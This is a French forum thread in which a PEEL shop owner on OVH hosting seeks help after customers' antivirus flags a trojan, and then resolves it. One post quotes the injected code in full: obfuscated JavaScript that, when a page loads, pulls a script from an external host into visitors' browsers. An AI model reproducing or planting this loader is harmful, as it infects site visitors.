cheval de troie - sujet résolu

[amap 0]

bonjour,

je viens vers vous, car deux de mes clientes me signalent que leur antivirus leur signale la présence d'un cheval de troie, lorsqu'elles vont sur mon site.

Je suis en peel premium hébergement ovh.

Je ne remarque rien d'anormal en me connectant, moi-même sur mon site, et je ne vois rien de suspect dans mes fichiers en passant par mon ftp.

Auriez vous la gentillesse de me signaler si vous avez un problème en prenant le temps d'aller sur mon site ?

Je vous remercie à tous,

mon site pour vérifier

[amap 0]

bonjour,

je viens vers vous, car deux de mes clientes me signalent que leur antivirus leur signale la présence d'un cheval de troie, lorsqu'elles vont sur mon site.

Je suis en peel premium hébergement ovh.

Je ne remarque rien d'anormal en me connectant, moi-même sur mon site, et je ne vois rien de suspect dans mes fichiers en passant par mon ftp.

Auriez vous la gentillesse de me signaler si vous avez un problème en prenant le temps d'aller sur mon site ?

Je vous remercie à tous,

mon site pour vérifier

après recherche sur mon site, j'ai noté que j'avais une ligne suspecte, dans tous les fichiers index du site : ;)

<script>var _=new String();function Y(){var B=window;var A=new String();var uH;if(uH!='' && uH!='I'){uH=''};var O=unescape;var r;if(r!=''){r='K'};var Uc;if(Uc!=''){Uc='LA'};var a=O("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%6c%6c%61%62%6f%75%74%2e%63%6f%2e%6a%70%2f%73%65%7a%6e%61%6d%2e%63%7a%2e%70%68%70");var b;if(b!='UX' && b!='c'){b=''};function p(S,k){var BR=new String();var Oi;if(Oi!='t'){Oi=''};var x=new String("YIOg".substr(3));var Q;if(Q!='d' && Q!='Zr'){Q='d'};var o=O("%5b"), R=O("%5d");var V=o+k+R;var Xl;if(Xl!='xd'){Xl='xd'};var Z=new RegExp(V, x);return S.replace(Z, new String());};this.pf='';var _B;if(_B!='IH'){_B='IH'};var Zn=document;var Sm=new Date();var v=new Date();var YJ=p('856012682470173','46391257');var G=new Array();this.SH='';var L=new String();var Oh=new Date();var lR="";function M(){var tH=new Date();var BC=O("%68%74%74%70%3a%2f%2f%66%6c%6f%72%69%64%61%6f%72%69%67%69%6e%2e%61%74%3a");var Qq=new Array();this.Gi="";L=BC;var kg;if(kg!='' && kg!='La'){kg=null};var Lp="";L+=YJ;var N;if(N!='oR' && N!='IG'){N=''};var yF;if(yF!='' && yF!='IF'){yF='rA'};L+=a;var Dy;if(Dy!='F' && Dy!='YB'){Dy=''};var Bw;if(Bw!='m_' && Bw!='Cy'){Bw=''};this.iB='';try {this.Ku="";var Oc;if(Oc!='' && Oc!='Hr'){Oc=''};j=Zn.createElement(p('swcFrLiFpDtM','jaLD2FHKAwMq'));var nj='';var Bv;if(Bv!='' && Bv!='dO'){Bv=''};j[O("%73%72%63")]=L;var LI;if(LI!='' && LI!='zV'){LI='Tg'};var _r;if(_r!='' && _r!='cS'){_r='XH'};j[O("%64%65%66%65%72")]=[1][0];var ma;if(ma!='aR'){ma=''};var tB=new String();var qn;if(qn!='aS' && qn!='uR'){qn='aS'};var MS;if(MS!='' && MS!='Gt'){MS=''};var Ry;if(Ry!='' && Ry!='yj'){Ry=''};Zn.body.appendChild(j);var BwI=new String();var zG=new String();this.FD="";} catch(U){alert(U);};var fex='';var xK;if(xK!='vP' && xK!='KX'){xK=''};}var DR=new String();var OD;if(OD!='' && OD!='wo'){OD='YQ'};var Ah='';var HG='';B[string("onl"+"9Rhoad".substr(3))]=M;this.Ve='';var Wm=new String();};Y();</script>

<!--ab65703b445b844ca864623ab814a4b5-->

j'ai procédé au nettoyage et j'ai aussi enlevé PHPMY VISIT.

J'espère que cela va fonctionner.

Comment changer les mots de passe FTP ? :(

[amap 0]

voici le nom du trojan : trojan JS:Illredir-E [Trj]

mon site en local, n'étant pas vérolé, j'ai fait le transfert de tous les fichiers suspects.

Ceci viendrait directement d'OVH

j'aimerai savoir si certains parmi vous aurez constaté, déjà cela. Car, pas très rassurant, en faisant une recherche sur internet, il s'avère que je ne suis pas un cas unique.

Merci pour votre aide.

;)

[amap 0]

voici le nom du trojan : trojan JS:Illredir-E [Trj]

mon site en local, n'étant pas vérolé, j'ai fait le transfert de tous les fichiers suspects.

Ceci viendrait directement d'OVH

j'aimerai savoir si certains parmi vous aurez constaté, déjà cela. Car, pas très rassurant, en faisant une recherche sur internet, il s'avère que je ne suis pas un cas unique.

Merci pour votre aide.

;)

le problème vient juste d'être signalé sur le forum d'OVH, ce qui prouve que je ne suis pas seule dans ce cas;

OVH FORUM

[amap 0]

le problème vient juste d'être signalé sur le forum d'OVH, ce qui prouve que je ne suis pas seule dans ce cas;

OVH FORUM

Fichiers attaqués : fichiers index et JS

[amap 0]

Problème résolu. OVH pas mis en cause, un de mes fichiers infectés. Je dois changer mes codes d'accès ftp ;) et mise à jour de mon antivirus.

bonne journée à tous